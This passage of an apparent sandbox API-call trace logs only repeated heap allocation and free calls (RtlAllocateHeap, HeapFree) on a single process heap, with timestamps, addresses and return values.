lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5fd10 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5f6a8 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5eeb8 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61df8 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5fb20 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc610b0 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61140 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611d0 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73770 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73800 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73890 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73920 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc755e0 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75cc8 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75d58 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75728 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76388 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc757b8 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76418 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75848 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ba8 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0030.630] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a88 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75968 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75e78 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76538 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75de8 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76028 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc61910 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc56ed0 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e560 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75cc8 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76538 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc56ed0 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc66f88 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc612d8 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc610b0 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x10c) returned 0xc73770 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c00 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc758d8 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc73888 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0030.631] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c90 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.631] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc75f08 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c90 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76a78 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.632] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.632] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.633] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc610b0 | out: hHeap=0xc50000) returned 1 [0030.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73888 | out: hHeap=0xc50000) returned 1 [0030.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73770 | out: hHeap=0xc50000) returned 1 [0030.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76a78 | out: hHeap=0xc50000) returned 1 [0030.634] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c00 | out: hHeap=0xc50000) returned 1 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76388 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76148 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75d58 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc761d8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76268 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76418 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75de8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75c38 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc765c8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75968 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76028 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75e78 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc762f8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f08 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc760b8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f98 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc764a8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75698 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc758d8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc759f8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75b18 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc757b8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75728 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75a88 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75ba8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75848 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76aa8 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc77558 [0030.634] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc77798 [0030.635] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc775e8 [0030.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc77048 [0030.663] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76e98 [0030.666] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76388 | out: hHeap=0xc50000) returned 1 [0030.666] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76148 | out: hHeap=0xc50000) returned 1 [0030.666] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75d58 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc761d8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76268 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76418 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75de8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c38 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75968 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76028 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75e78 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc762f8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760b8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f98 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc764a8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc759f8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b18 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc757b8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75728 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a88 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ba8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75848 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76aa8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77558 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77798 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc775e8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77048 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76e98 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76538 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc56ed0 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75cc8 | out: hHeap=0xc50000) returned 1 [0030.667] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72038 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76148 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f08 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc56ed0 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc66f88 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc612d8 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc610b0 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71f28 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x10c) returned 0xc73770 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73cc0 [0030.668] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75f98 [0030.668] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, 